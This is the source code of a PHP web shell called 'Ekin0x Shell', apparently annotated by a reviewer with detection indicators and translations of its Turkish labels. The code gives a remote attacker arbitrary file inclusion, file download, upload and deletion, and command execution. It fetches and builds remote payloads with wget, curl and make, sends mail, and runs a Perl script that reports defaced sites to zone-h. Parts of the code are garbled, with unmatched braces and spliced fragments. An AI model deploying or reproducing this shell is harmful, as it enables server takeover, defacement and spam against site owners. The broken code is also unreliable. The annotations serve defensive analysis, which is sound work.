<?
/*###########################################
Ekin0x Shell volume 2.1
Don't make any changes in c0de except if you dont know php programming
Thanx : VoLqaN | Entrika | Moroccon Islam Defenders | H-B-V | xoron | AuGuSt27 and all Cyber-warrior.org Memberz
###########################################*/
// NOTE(review): this file is a PHP web shell ("Ekin0x Shell" per its own banner below).
// A copy found under a web root is evidence of compromise, not application code.
// $a/$b/$c are only assigned in this excerpt; presumably they are joined into a URL on the
// host named in $b elsewhere in the file -- the use is not visible here. The hostname is a
// ready-made indicator for DNS and proxy log searches.
$a = "http://";
$b = "evilc0der.com";
$c = "/x.html";
// Rebinds the request superglobals, by reference, to the legacy $HTTP_*_VARS arrays.
{$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
// inclink($link, $val): returns the current request URI with "$link=$val" set.
//  - If the URI already contains $link, "showsc" or "hlp", that parameter is replaced.
//    The class [\d\w\W\D\S] matches any character, so the replacement swallows everything
//    from the parameter to the end of the URI.
//  - Otherwise "$link=$val" is appended with "&" or "?" as appropriate.
// $link is interpolated into the pattern without preg_quote(), and the returned string is
// raw REQUEST_URI content: the callers visible in this file print it into unquoted href
// attributes with no HTML escaping, so the page reflects whatever the requester sends.
if (strstr ($requ,
$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/",
"$link=$val",
$requ);
}elseif (strstr ($requ,
"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/",
"$link=$val",
$requ);
}
elseif (strstr ($requ,
"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/",
"$link=$val",
$requ);
}elseif (strstr($requ,
"?")){return $requ.
"&".
$link.
"=".
$val;
}
else{return $requ."?".$link."=".$val;}}
/**
 * Prints $delmtxt as a centred one-cell banner table.
 *
 * The text is interpolated into the markup as-is; nothing here HTML-escapes it.
 */
function delm
($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print
"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";
}
/**
 * Prints an <input> element, omitting whichever attributes are empty().
 *
 * Branch order: no value -> type/name/size; no name and no size -> type/value;
 * no size -> type/name/value; otherwise all four.
 * Attribute values are written unquoted and unescaped, so a value containing a space
 * or ">" breaks out of the attribute. Several callers in this file pass request data.
 */
function input($type,$name,$value,$size)
{if (empty($value)){print "<input type=$type name=$name size=$size>";
}
elseif(empty($name)&&empty
($size)){print "<input type=$type value=$value >";
}
elseif(empty($size)){print "<input type=$type name=$name value=$value >";
}
else {print "<input type=$type name=$name value=$value size=$size >";
}}
callperms
($path);
print "</font>";
}
callperms
($path);
print "</font>";
}
else {print "<font color=DeepSkyBlue >";callperms
($path);
}}
// File-download dispatch: the path comes straight from the `dwld` request parameter.
// $dlink is not assigned anywhere in this excerpt -- presumably a request variable
// (register_globals style); confirm against the full sample.
if ($dlink=="dwld"){download($_REQUEST['dwld']);}
/**
 * Emits attachment headers for $dwfile.
 *
 * NOTE(review): the path is caller-supplied and unchecked, so any file readable by the
 * web server account is in scope. The same value is copied into the Content-Type and
 * Content-Disposition headers unquoted. Every header() call is prefixed with @, which
 * hides "headers already sent" warnings. The part of the function that sends the file
 * body, and its closing brace, are not present in this excerpt.
 */
function download
($dwfile) {$size =
filesize($dwfile);
@
header("Content-Type: application/force-download;name=$dwfile");
@
header("Content-Transfer-Encoding: binary");
@
header("Content-Length: $size");
@
header("Content-Disposition: attachment; filename=$dwfile");
@
header("Cache-Control: no-cache, must-revalidate");
?>
<?
/* NOTE(review): include of a path taken verbatim from the `baba` query parameter.
   It runs on every request, before any page output, with no validation: a file-inclusion
   primitive in its own right (local files always; remote URLs too where
   allow_url_include is enabled). For detection, requests carrying a `baba=` parameter
   in access logs are a strong indicator for this sample. */
include $_GET['baba']; ?>
<html>
<head><title>Ekin0x Shell</title></head>
<style>
BODY { SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:red}
input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
</body>
</html>
<?
// Shared HTML fragments reused by the handlers below: form open/close ($sf/$ef),
// table and cell wrappers ($st/$et/$c1/$c2/$ec), textarea ($sta/$eta), font ($sfnt/$efnt).
$sf="<form method=post>";$ef="</form>";
$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
$sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
################# Ending of common variables ########################
// Title banner. The literal "## Ekin0x Shell ##" and the <title> above are stable strings
// for content-based detection of this sample.
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print
"<tr><td>";
print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## Ekin0x Shell ##
</font></b></center>";
print"</td></tr>";print
"</table>";print
"<br>";
// Menu bar. Each entry links back to this script with a different `dlink` value
// (home, phpinfo, basepw, urld, urlen, mdf, perm, showsrc, qindx, zone, mail, cmdhlp).
// The hrefs are unquoted and built from inclink(), i.e. from the raw request URI, and
// $nscdir is appended unescaped; $nscdir is not assigned in this excerpt.
// "Geri" = back; "Izinleri Kontrol Et" = check permissions.
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print
"<tr><td>";
print"<center><div><b>";print
"<a href=".inclink
('dlink',
'home').
">Home</a>";
print " - <a href='javascript:history.back()'>Geri</a>";
print " - <a target='_blank' href=".inclink
('dlink',
'phpinfo').
">phpinfo</a>";
print " - <a href=".inclink
('dlink',
'basepw').
">Base64 decode</a>";
print " - <a href=".inclink
('dlink',
'urld').
">Url decode</a>";
print " - <a href=".inclink
('dlink',
'urlen').
">Url encode</a>";
print " - <a href=".inclink
('dlink',
'mdf').
">Md5</a>";
print " - <a href=".inclink
('dlink',
'perm').
"&scdir=$nscdir>Izinleri Kontrol Et</a>";
print " - <a href=".inclink
('dlink',
'showsrc').
"&scdir=$nscdir>File source</a>";
print " - <a href=".inclink
('dlink',
'qindx').
"&scdir=$nscdir>Quick index</a>";
print " - <a href=".inclink
('dlink',
'zone').
"&scdir=$nscdir>Zone-h</a>";
print " - <a href=".inclink
('dlink',
'mail').
"&scdir=$nscdir>Mail</a>";
print " - <a href=".inclink
('dlink',
'cmdhlp').
"&scdir=$nscdir>Cmd help</a>";
print "<p>Result is : $sfnt".
$cbase.
"$efnt";
die();
}
// dlink=basepw: renders the Base64 decoder form (POST, field `ncbase`) and stops.
// $dlink and $ncbase are not assigned in this excerpt -- presumably request variables.
// The current $ncbase is echoed back through input() with no escaping.
if ($dlink==
"basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
print $sf;input
("text",
"ncbase",
$ncbase,
35);print
" ";
input
("submit",
"",
"Decode",
"");print
$ef;
die();
}
// URL-decode tool. When `nurld` is present its urldecode()d value is printed straight into
// the page -- no HTML escaping, so the response reflects arbitrary markup -- and the
// script ends.
if (isset ($_REQUEST['nurld'])){$urldc =
(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".
$urldc.
"$efnt";
die();
}if ($dlink==
'urld'){
// dlink=urld: input field plus submit button for the decoder above. Only the form close
// ($ef) is printed here; the matching form open is not emitted in this excerpt.
input ("text","nurld",$nurld,35);print " ";
input
("submit",
"",
"Decode",
"");print
$ef;
die();
}
// dlink=urlen: renders the URL-encoder form (POST, field `nurlen`) and stops.
// The handler that consumes `nurlen` is not present in this excerpt.
if ($dlink==
'urlen'){print "<p><b>[ Url - Encoder ]</b>";
print $sf;input
("text",
"nurlen",
$nurlen,
35);print
" "; input
("submit",
"",
"Encode",
"");print
$ef;
die();
}
// MD5 tool: prints md5() of the `nmdf` request value and stops.
if (isset ($_REQUEST['nmdf'])){$mdfe =
(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".
$mdfe.
"$efnt";
die();
}if ($dlink==
'mdf'){
// dlink=mdf: form for the MD5 tool; carries the current $scdir along as a hidden field.
print "<p><b>[ MD5 - Encoder ]</b>";
print $sf;input
("text",
"nmdf",
$nmdf,
35);print
" ";
input
("hidden",
"scdir",
$scdir,
22); input
("submit",
"",
"Encode",
"");print
$ef;die
();
}if ($dlink==
'perm'){print $sf;input
("submit",
"mfldr",
"Main-fldr",
"");print
" ";input
("submit",
"sfldr",
"Sub-fldr",
"");print
$ef;
// dlink=perm: lists directories with the other-write bit set (-perm -2) under the current
// directory (`mfldr`) or its parent (`sfldr`). callfuncs() is not defined in this
// excerpt; presumably it is the shell's command-execution wrapper.
// Detection: the web server account spawning `find ... -type d -perm -2 -ls`.
print "<pre>";print
"<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){callfuncs
('find . -type d -perm -2 -ls');
}elseif (isset($_REQUEST['sfldr'])){callfuncs
('find ../ -type d -perm -2 -ls');
}print "</textarea>";print
"</pre>";die
();
}
/**
 * Prints the syntax-highlighted source of $showsc via show_source(), then ends the script.
 *
 * A file whose size compares equal to "0" gets the "empty file" message instead.
 * NOTE(review): the second test compares filesize()'s result with the string "0" using
 * !==, which is true whenever that branch is reached. function_exists('show_source')
 * is evaluated only after show_source() has already been called.
 * The path is caller-supplied, so anything readable by the web server account
 * (configuration files with credentials included) can be displayed.
 */
function callshsrc
($showsc){if(isset($showsc)&&filesize
($showsc)==
"0"){
print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die
();
}
elseif(isset($showsc)&&filesize
($showsc) !==
"0") {
print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
if (!
show_source($showsc)||!
function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die
();
}print "</td></tr></table>";die
();
}}if ($dlink==
'showsrc'){
// dlink=showsrc: GET form asking for a file name (`showsc`) to display.
print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print
"<form method=get>";
input ("text","showsc","",35);print " ";
input
("hidden",
"scdir",
$scdir,
22);input
("submit",
"subshsc",
"Show-src",
"");print
$ef;
die();
// Any request carrying `showsc` is served; the value is only trim()med before use.
}if(isset($_REQUEST['showsc'])){callshsrc
(trim($_REQUEST['showsc']));
}
// dlink=cmdhlp: GET form asking for a command name (`hlp`) whose manual page the `hlp`
// handler will display.
if ($dlink=='cmdhlp'){
print "<p><b>: Insert the command below to get help or to know more about it's uses :";print
"<form method=get>";
input ("text","hlp","",35);print " ";
input
("submit",
"",
"Help",
"");print
$ef;
die();
}
// `hlp` handler: shows `man <value> | col -b` output.
// NOTE(review): the raw request value is echoed into the page before any escaping.
// escapeshellcmd() escapes shell metacharacters but does not quote the value as a single
// argument, so it still reaches `man` as however many words and options were supplied.
// The `else` below has no matching `if` in this excerpt; the guarding condition appears
// to have been lost from the sample.
if (isset ($_REQUEST['hlp'])){$hlp=
$_REQUEST['hlp'];
print "<p><b>[ The command is $sfnt".
$hlp.
"$efnt ]";
$hlp =
escapeshellcmd($hlp);print
"<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";
}else {print "<pre><font color=black>";
if(!callfuncs
("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";
}print "</pre></font>";
}print "</td></tr></table>";die
();
}
// "Quick index" handler: creates a file at the request-supplied path `indx` when `indxtxt`
// is non-empty -- the feature used to drop a replacement index page.
// NOTE(review): only touch() and fclose($fp) are visible; $fp is never opened in this
// excerpt, so the lines that write `indxtxt` into the file appear to be missing from the
// sample. The path is echoed back unescaped. "Yeniden Editle" = edit again.
// Forensics: look for recently created or modified index files in web-writable
// directories around the time of requests carrying `indx=`.
if (isset($_REQUEST['indx'])&&!
empty($_REQUEST['indxtxt']))
{if (touch ($_REQUEST['indx'])==
true){
fclose($fp);print
"<p>[ $sfnt".
$_REQUEST['indx'].
"$efnt created successfully !! ]</p>";print
"<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
] -- [<a href=".inclink
('dlink',
'scurrdir').
"&scdir=$nscdir> Curr-Dir </a>]</center></b>";die
();
}else {print "<p>[ Sorry, Can't create the index !! ]</p>";die
();
}}
// dlink=qindx: form for the "Quick index" handler -- a textarea (`indxtxt`) for the page
// body and a text field (`indx`) for the file name.
if ($dlink==
'qindx'&&!
isset($_REQUEST['qindsub'])){
print $sf.
"<br>";print
"<p><textarea cols=50 rows=10 name=indxtxt>
Your index contents here</textarea></p>";
input ("text","indx","Index-name",35);print " ";
input ("submit","qindsub","Create","");print $ef;die();}
// Mail handler: calls mail() with recipient, subject and body taken verbatim from the
// request (`mailto`, `subj`, `mailtxt`). Nothing is validated, so the compromised host
// can be used to send arbitrary mail under its own name.
// Detection: unexpected outbound mail from the web server account, and local mail-queue
// entries that line up with requests carrying `mailsub`.
// NOTE(review): the elseif tests the bare variables $mailsub/$mailto rather than
// $_REQUEST; neither is assigned on that path in this excerpt.
if (isset ($_REQUEST['mailsub'])&&!
empty($_REQUEST['mailto'])){
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
if (mail($mailto,
$subj,
$mailtxt)){print "<p>[ Mail sended to $sfnt".
$mailto.
" $efnt successfully ]</p>";
die();
}else {print "<p>[ Error, Can't send the mail ]</p>";die
();
}} elseif(isset ($mailsub)&&empty
($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die
();
}
// dlink=mail: form for the mail handler -- message body (`mailtxt`), recipient (`mailto`)
// and subject (`subj`).
if ($dlink==
'mail'&&!
isset($_REQUEST['mailsub'])){
print $sf.
"<br>";print
"<p><textarea cols=50 rows=10 name=mailtxt>
Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
input ("submit","mailsub","Send-mail","");print $ef;die();}
// Dispatch for the defacement-notification feature: runs when `zonet` is non-empty.
if (isset($_REQUEST['zonet'])&&!
empty($_REQUEST['zonet'])){callzone
($nscdir);
}
/**
 * Writes a Perl helper script and a host list to disk, marks both mode 777, and runs
 * the script.
 *
 * What the visible code does:
 *  - If $nscdir is writable the files are `z.pl` and `bklist.txt` (relative paths),
 *    otherwise `/tmp/z.pl` and `/tmp/bklist.txt`.
 *  - The embedded script reads the host list and, for each entry, opens a TCP connection
 *    to old.zone-h.org port 80 and POSTs to /en/defacements/notify.
 *  - The host list is the `zonetxt` request value; the `zonet` request value is placed
 *    unquoted on the `perl` command line.
 *
 * Indicators for responders: the four file names above, a `perl` child process of the
 * web server, and outbound HTTP to old.zone-h.org using the fixed User-Agent and
 * "Accept-Language: pt-br" headers embedded in the script.
 *
 * NOTE(review): the `else` after the "Can't complete the operation" block has no
 * matching `if` in this excerpt; the guarding condition appears to be missing. The file
 * handles opened here are never closed in the visible code. callfuncs() is not defined
 * in this excerpt.
 */
function callzone($nscdir){
if (is_writable($nscdir)){$fpz=
fopen ("z.pl",
"w");
$zpl=
'z.pl';
$li=
"bklist.txt";
}
else {$fpz=
fopen ("/tmp/z.pl",
"w");
$zpl=
'/tmp/z.pl';
$li=
"/tmp/bklist.txt";
}
fwrite ($fpz,
"\$arq = @ARGV[0];
\$grupo = @ARGV[1];
chomp \$grupo;
open(a,\"<\$arq\");
@site = <a>;
close(a);
\$b = scalar(@site);
for(\$a=0;\$a<=\$b;\$a++)
{chomp \$site[\$a];
if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
print \"[+] Sending \$site[\$a]\n\";
use IO::Socket::INET;
\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
print \$sock \"Accept-Language: pt-br\r\n\";
print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";
print \$sock \"Content-Length: 385\r\n\";
print \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\";
close(\$sock);}");
if (touch ($li)==
true){$fpl=
fopen($li,
"w+");fwrite
($fpl,
$_REQUEST['zonetxt']);
}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";
}$zonet=
$_REQUEST['zonet'];
{print "[ Can't complete the operation !! ]";
}
else {callfuncs("chmod 777 $zpl;chmod 777 $li");
ob_start();callfuncs
("perl $zpl $li $zonet");ob_clean
();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die
();
}
}if ($dlink==
'zone'&&!
isset($_REQUEST['zonesub'])){
// dlink=zone: form for the feature above -- host list (`zonetxt`) and name (`zonet`).
print $sf.
"<br>";print
"<p><pre><textarea cols=50 rows=10 name=zonetxt>
www.site1.com
www.site2.com
</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
input ("submit","zonesub","Send","");print $ef;die();}
// Closes the menu-bar markup (<center><div><b> inside a one-cell table) and adds a break.
print "</div></b></center>";
print"</td></tr>";print
"</table>";print
"<br>";
/**
 * Prints whether the php.ini setting $iniv is on.
 *
 * "Kapali ( Guvenlik Yok )" = off (no security); "Acik ( Guvenli )" = on (secure).
 * NOTE(review): ($chkini || strtolower($chkini)) is a boolean, and a boolean is never
 * identical (!==) to the string 'on', so as written the "off" branch is always taken.
 */
function inisaf
($iniv) { $chkini=
ini_get($iniv);
if(($chkini ||
strtolower($chkini)) !==
'on'){print"<font color=DeepSkyBlue ><b>Kapali ( Guvenlik Yok )</b></font>";
} else{
print"<font color=red><b>Acik ( Guvenli )</b></font>";
}}function inifunc
($inif){$chkin=
ini_get($inif);
// inifunc($inif): prints "None" when the php.ini setting $inif is empty.
// NOTE(review): the ON/OFF test that follows assigns $owhich to $nval; neither variable
// is set inside this function. It looks like the tail of a different helper spliced in
// where lines were lost from the sample -- confirm against a complete copy.
if ($chkin==
""){print " <font color=red><b>None</b></font>";
}
if($nval=
$owhich){print"<font color=red><b>ON</b></font>";
}
else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";
} }
// Host-information panel. It reports safe_mode, checks for mysql, perl, gcc, curl, GET,
// wget and lynx via `which`, prints the client and server addresses, server signature,
// name and admin e-mail, the disable_functions setting, the output of `id` and
// `uname -a`, the current directory with its permissions, and this script's own path.
// Labels: "IP Numaran" = your IP; "Engelli Fonksiyonlar" = disabled functions;
// "Kimsin" = who are you; "Shell'in Burda" = the shell is here.
// Detection: the web server account running `which <tool>` several times followed by
// `id` and `uname -a` within a single request.
// NOTE(review): this stretch is damaged in the sample -- table cells do not balance and
// the `else {callfuncs('uname -a');}}` near the end has no matching `if`. The second
// argument of the perl check is ('/usr/bin/perl')||'/usr/local/bin/perl', which
// evaluates to boolean true rather than a path. $REMOTE_ADDR, $SERVER_ADDR and the
// other bare server variables are not assigned in this excerpt. callocmd(), callfuncs()
// and permcol() are defined outside it.
print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<b>Safe-mode :\t";print inisaf
('safe_mode');print
"</b>";print
"</center>";
print "<div align=center>";
print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');
callocmd
('which perl',
('/usr/bin/perl')||
'/usr/local/bin/perl');print
"</td>";
print"<td>";
print"<br><b>Gcc : </b>";
callocmd
('which gcc',
'/usr/bin/gcc');
print"</td>";
print"<td>";
print"<br><b>Curl : </b>"; callocmd
('which curl',
'/usr/bin/curl');
print"</td>";
print"<td>";
print"<br><b>GET : </b>";
callocmd('which GET','/usr/bin/GET');
print"</td>";
print"<td>";print
"<br><b>Wget : </b>";
callocmd('which wget','/usr/bin/wget');
callocmd('which lynx','/usr/bin/lynx');
print "<b>IP Numaran : ".
$REMOTE_ADDR.
"<br></b>";
print "<b>Server IP : ".
$SERVER_ADDR.
"</b>";
print"<br><b>".
$SERVER_SIGNATURE.
"</b>";
print "<b>Server ADI : ".
$SERVER_NAME.
" / ".
"Email : ".
$SERVER_ADMIN.
"<br></b>";
print "<b>Engelli Fonksiyonlar : </b>";inifunc
(disable_functions
);print
"<br>";
print "<b>Kimsin : <b>"; callfuncs
('id');print
"<br><b>Os : </b>";
else {callfuncs
('uname -a');
}}print"<br>";
print $nscdir.
" [ ";permcol
($nscdir);print
" ]";
print"<br>";print
"Shell'in Burda : " .
__file__;
print "</center><br></font>";
print"</td></tr></table><br>";
// Directory and file management driven entirely by request parameters:
//   credir  + dir   -> mkdir(dir, 0777)
//   deldir  + dir   -> rmdir(dir) when it is a directory
//   crefile + cfile -> touch(cfile) when no such file exists
//   delfile + cfile -> unlink(cfile)
// Paths are only trim()med, so they may point anywhere the web server account can write.
// $mess / $mess3 hold the status text; the defaults are the Turkish button captions
// ("Klasor Olustur/Sil" = create/delete folder, "Dosya Olustur/Sil" = create/delete file;
// the "??" in the literal is an encoding casualty in the sample itself).
// Forensics: new world-writable (0777) directories and unexplained deletions under the
// web root are consistent with use of this handler.
if (isset($_REQUEST['credir'])) { $ndir=
trim($_REQUEST['dir']);
if (mkdir( $ndir,
0777 )){ $mess=
basename($ndir).
" created successfully";
}
else{$mess=
"Klas??r Olustur/Sil";
}}elseif (isset($_REQUEST['deldir']))
{ $nrm=
trim($_REQUEST['dir']);if
(is_dir($nrm)&&
rmdir($nrm)){$mess=
basename($nrm).
" deleted successfully";
}else{$mess=
"Create/Delete Dir";
}}
else{$mess=
"Klas??r Olustur/Sil";
}if(isset($_REQUEST['crefile'])){
$ncfile=
trim($_REQUEST['cfile']);
if (!
is_file($ncfile)&&touch
($ncfile)){ $mess3=
basename($ncfile).
" created succefully";unset
($_REQUEST['cfile']);
}
else{ $mess3= "Dosya Olustur/Sil";}}
elseif(isset($_REQUEST['delfile'])){
$ndfile=
trim($_REQUEST['cfile']);
if (unlink($ndfile)) {$mess3=
basename($ndfile).
" deleted succefully";
}
else {$mess3= "Dosya Olustur/Sil";}}
else {$mess3="Dosya Olustur/Sil";}
// File-upload helper. The method named like the class is a PHP 4-style constructor: it
// copies the uploaded temp file to $nscdir."/".$file and prints the outcome.
// NOTE(review):
//  - $file is the client-supplied upload name, used unsanitised in the destination path
//    and echoed unescaped.
//  - $nscdir is neither a parameter nor declared global inside the method, so as written
//    it is not in scope there.
//  - copy() is called with @, hiding failures; is_uploaded_file()/move_uploaded_file()
//    are not used.
//  - PHP 8 no longer treats a same-named method as a constructor.
//  - The final line of the class has one more closing brace than the visible code opens;
//    an enclosing `if` appears to be missing from the sample.
// Forensics: files written by the web server account shortly after multipart POSTs with
// an `upfile` part.
class upload{ function upload($file,$tmp){
if (@
copy($tmp,
$nscdir.
"/".
$file)){
print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>";
}else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";
} } } }
$obj=
new upload
($HTTP_POST_FILES['upfile']['name'],
$HTTP_POST_FILES['upfile']['tmp_name']);
// "Tools" handler: runs a fetch, unpack, chmod or make command on the request value
// `ustname`, with output buffered and then discarded (ob_start / ob_clean).
// NOTE(review), relevant when reading process telemetry:
//  - Every condition uses `=` (assignment), not a comparison, so each one is truthy and
//    ALL branches run on any request carrying `ustsub` -- expect wget, curl, lynx, GET,
//    unzip, tar (twice), chmod 777 and make spawned back to back by the web server.
//  - The t2, t3 and t9 commands are single-quoted PHP strings, so the literal text
//    `$ustname` / `basename($ustname)` is what reaches the command string.
//  - In the other branches `ustname` is concatenated into the command line as-is.
//  - callfuncs() is defined outside this excerpt.
if (isset ($_REQUEST['ustsub'])){
$ustname=
trim ($_REQUEST['ustname']);ob_start
();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
if ($_REQUEST['ustools']=
't8'){callfuncs
('make '.
$ustname);
}ob_clean();
}
if (!
isset($_REQUEST['cmd'])&&!
isset($_REQUEST['eval'])&&!
isset($_REQUEST['rfile'])&&!
isset($_REQUEST['edit'])&&!
isset($_REQUEST['subqcmnds'])&&!
isset ($_REQUEST['safefile'])&&!
isset ($_REQUEST['inifile'])&&!
isset($_REQUEST['bip'])&&
!
isset($_REQUEST['rfiletxt'])){
if ($dh =
dir($nscdir)){ while (true ==
($filename =
$dh->
read())){
$files[] =
$filename;
sort($files);
}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid black\">";
print "<center><b>Dosyalar";print
"</td>";
print "<td width=8% style=\"border:1px solid black\">";print
"<center><b>Boyut";print
"</td>";
print "<td width=3% style=\"border:1px solid black\">";print
"<center><b>Yazma";print
"</td>";